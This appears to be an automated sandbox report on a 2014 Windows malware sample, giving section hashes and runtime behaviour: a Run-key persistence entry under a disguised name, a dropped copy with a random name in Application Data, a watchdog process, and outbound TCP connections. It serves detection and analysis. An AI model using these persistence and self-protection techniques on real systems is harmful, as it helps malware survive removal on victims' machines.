Analysis Date: 2014-09-19 04:38:45

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 8230a0256893069887e597f4c4796b0c sha1: 1b81925fcc1a5e180e51d2f35f6f31ac607c639b size: 291840
Section .rdata: md5: 50fd61f463e5b61f49c06c5f6a237164 sha1: 7ad63f82197673ead30ca8166f1652ab7e6778f9 size: 33280
Section (name not recorded): md5: 0b831a7f44b49abac6a110c84dd9366c sha1: 9f64cdb18e4d038b1b605588f20a24050510aaaa size: 105984
Timestamp: 2014-07-24 05:04:52
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Provider Connectivity Security Sharing ➝ C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe

↳ C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\odjhmtszjizs.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.sdyb4
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\vbbketmfxnfca\cbdaafmkimt.exe"

Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝
Flows TCP: 192.168.1.1:1038 ➝
Flows TCP: 192.168.1.1:1039 ➝
Flows TCP: 192.168.1.1:1040 ➝
Flows TCP: 192.168.1.1:1041 ➝

Raw Pcap

